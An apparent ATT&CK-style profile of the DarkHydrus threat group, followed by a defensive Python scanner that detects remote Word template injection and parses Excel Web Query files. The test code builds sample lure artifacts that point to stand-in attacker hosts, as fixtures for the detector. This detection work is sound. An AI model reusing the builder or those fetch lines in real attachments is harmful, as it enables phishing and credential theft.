DarkHydrus
DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. [1] [2]
ID: G0079
Aliases: DarkHydrus
Version: 1.0
Alias Descriptions
Name | Description |
---|---|
DarkHydrus | [1] |
Techniques Used
Domain | ID | Name | Use |
---|---|---|---|
Enterprise | T1187 | Forced Authentication | DarkHydrus used Template Injection to launch an authentication window for users to enter their credentials.[3] |
Enterprise | T1086 | PowerShell | DarkHydrus leveraged PowerShell to download and execute additional scripts.[1][2] |
Enterprise | T1193 | Spearphishing Attachment | DarkHydrus has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the “attachedTemplate” technique to load a template from a remote server.[1][3][2] |
Enterprise | T1221 | Template Injection | DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication.[3] |
Enterprise | T1204 | User Execution | DarkHydrus has sent malware that required users to click the Enable button in Microsoft Excel so that the .iqy file could retrieve its content from a remote server.[1][2] |
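The two delivery artifacts in the table above, the remote-template relationship that Phishery-style injection plants in a Word document (T1221/T1187) and the Excel Web Query file (T1193/T1204), are both plain text inside the attachment and can be triaged before anyone opens them. The scanner below is an added example, not ATT&CK content and not DarkHydrus or Phishery code: it walks every `.rels` part of an OOXML package for an `attachedTemplate` relationship whose target leaves the host, and parses a `.iqy` file to expose the URL Excel would fetch after the user clicks Enable. The sample document it builds and the `.iqy` body, host names and addresses are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
# Constructed sample .iqy body; the host is a TEST-NET-2 address, not a real server.
SAMPLE_IQY = "WEB\r\n1\r\nhttp://198.51.100.10/update.php\r\n\r\nSelection=AllTables\r\n"


def is_remote_target(target):
    """True when an attachedTemplate target would make Word reach over the network.

    Local templates (e.g. file:///C:/.../Normal.dotm) are a normal Word feature
    and are not flagged; http/https/ftp URLs, UNC paths and file:// URLs with a
    host component are. A UNC or HTTP target that demands credentials is what
    produces the authentication prompt behind Forced Authentication.
    """
    if target.startswith("\\\\"):
        return True
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    if scheme in ("http", "https", "ftp"):
        return True
    return scheme == "file" and parsed.netloc not in ("", "localhost")


def find_remote_templates(docx_bytes):
    """Return [(rels_part, target)] for every remote attachedTemplate in an OOXML file.

    Every *.rels part in the package is inspected, not only
    word/_rels/settings.xml.rels, so a relationship injected into an
    unexpected part is still reported.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as package:
        for name in package.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(package.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == ATTACHED_TEMPLATE:
                    target = rel.get("Target", "")
                    if is_remote_target(target):
                        hits.append((name, target))
    return hits


def parse_iqy(text):
    """Parse an Excel Web Query file into (url, options).

    Layout: line 1 is the literal WEB, line 2 the version, line 3 the URL Excel
    fetches once the user clicks Enable; later non-empty lines are key=value options.
    """
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel Web Query file")
    options = {}
    for line in lines[3:]:
        key, _, value = line.partition("=")
        options[key.strip()] = value.strip()
    return lines[2], options


def build_sample_docx(template_url):
    """Build a minimal .docx whose settings part points at template_url.

    Constructed sample in the shape a remote-template injection produces, used
    only to exercise the scanner; it is not a file recovered from any campaign.
    """
    settings = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
        ' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>'
    )
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
        f'Type="{ATTACHED_TEMPLATE}" Target="{template_url}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as package:
        package.writestr("word/settings.xml", settings)
        package.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Hypothetical template host, for illustration only.
    malicious = build_sample_docx("http://templates.attacker.example/t.dotm")
    print("remote templates:", find_remote_templates(malicious))
    print("local Normal.dotm:", find_remote_templates(build_sample_docx("file:///C:/Users/u/Normal.dotm")))
    print("iqy fetches:", parse_iqy(SAMPLE_IQY))
```

Run it against a real attachment by reading the file's bytes into `find_remote_templates` (for `.docx`, `.dotx`, `.docm`) or its text into `parse_iqy`. Treating `TargetMode="External"` alone as the signal would flag every document whose author has a template on their own disk, which is why the check looks at the target's scheme and host instead.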